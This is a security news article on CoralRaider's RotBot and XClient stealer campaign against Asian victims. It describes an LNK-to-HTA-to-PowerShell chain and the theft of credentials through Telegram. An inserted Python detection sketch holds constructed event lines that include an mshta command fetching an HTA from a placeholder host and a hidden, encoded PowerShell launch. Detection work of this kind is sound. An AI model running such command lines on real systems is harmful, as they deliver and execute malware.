RotBot Malware Used on Asian Victims

A suspected threat actor of Vietnamese origin has been observed targeting individuals in various Asian and Southeast Asian nations with malicious software aimed at extracting valuable data since at least May 2023. Identified by Cisco Talos as CoralRaider, this group appears to be driven by financial motives. Their campaign spans across India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.

Security researchers Chetan Raghuprasad and Joey Chen have noted that CoralRaider concentrates on pilfering victims' credentials, financial records, and social media profiles, including business and advertising accounts. They deploy customized variants of Quasar RAT named RotBot and XClient stealer as their primary tools.

In addition to these, the group employs various off-the-shelf malware such as AsyncRAT, NetSupport RAT, and Rhadamanthys for remote access and data theft. Particularly in Vietnam, they have shown interest in seizing control of business and advertising accounts using malware families like Ducktail, NodeStealer, and VietCredCare.

Telegram Used to Funnel Stolen Data

The stolen information is transferred through Telegram and sold in underground markets for profit. CoralRaider's operators are believed to be based in Vietnam, evident from their communication on Telegram channels and the use of Vietnamese language elements in their tools.

Their attack typically begins with a Windows shortcut file (LNK), although the method of distribution remains unclear. Upon opening the LNK file, an HTML application (HTA) is downloaded from a server controlled by the attacker, triggering an embedded Visual Basic script. This script decrypts and executes three PowerShell scripts consecutively, responsible for various evasion tactics and the deployment of RotBot.
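The chain above (shortcut opened from the shell, which launches an HTA via mshta.exe, which in turn launches PowerShell) is a parent-child sequence that endpoint telemetry can surface. The following detection sketch is an added example, not code from Cisco Talos or from the article; the event lines are constructed, the URL is a placeholder, and the simplified "pid ppid image command" record format is an assumption.

```python
from collections import OrderedDict

# Constructed sample process-creation events (not real telemetry).
# Record format assumed here: "<pid> <ppid> <image> <command line>".
SAMPLE_EVENTS = """
4100 800 explorer.exe C:\\Windows\\explorer.exe
4120 4100 mshta.exe mshta.exe http://placeholder.invalid/page.hta
4130 4120 powershell.exe powershell.exe -nop -w hidden -enc AAAA
4150 4100 notepad.exe notepad.exe report.txt
4160 4150 powershell.exe powershell.exe -c Get-Date
"""

# Lineage described in the article: desktop shell -> HTA host -> PowerShell.
SUSPICIOUS_CHAIN = ("explorer.exe", "mshta.exe", "powershell.exe")


def parse_events(text):
    """Map pid -> (ppid, image, command line) from the sample records."""
    events = OrderedDict()
    for line in text.strip().splitlines():
        pid, ppid, image, cmdline = line.split(" ", 3)
        events[int(pid)] = (int(ppid), image.lower(), cmdline)
    return events


def ancestry(events, pid):
    """Image names from pid upward (child first); stops at unknown parents."""
    chain, seen = [], set()
    while pid in events and pid not in seen:
        seen.add(pid)
        ppid, image, _ = events[pid]
        chain.append(image)
        pid = ppid
    return chain


def find_hta_to_powershell(events):
    """Return (pid, lineage, cmdline) for PowerShell processes whose
    immediate ancestry matches the explorer -> mshta -> powershell chain."""
    expected = list(reversed(SUSPICIOUS_CHAIN))  # child-first order
    hits = []
    for pid, (_, image, cmdline) in events.items():
        if image != SUSPICIOUS_CHAIN[-1]:
            continue
        lineage = ancestry(events, pid)
        if lineage[: len(expected)] == expected:
            hits.append((pid, " -> ".join(reversed(lineage[:3])), cmdline))
    return hits
```

Running it over the sample flags only pid 4130; the PowerShell instance launched from Notepad is left alone because its parent is not the HTA host.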

RotBot, once activated, connects with a Telegram bot to retrieve and execute XClient stealer in memory. This malware specializes in harvesting cookies, credentials, and financial data from popular web browsers such as Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera, along with data from Discord and Telegram.

Moreover, XClient is designed to extract information from victims' social media accounts like Facebook, Instagram, TikTok, and YouTube, including details related to payment methods and permissions associated with Facebook business and advertising accounts.

April 5, 2024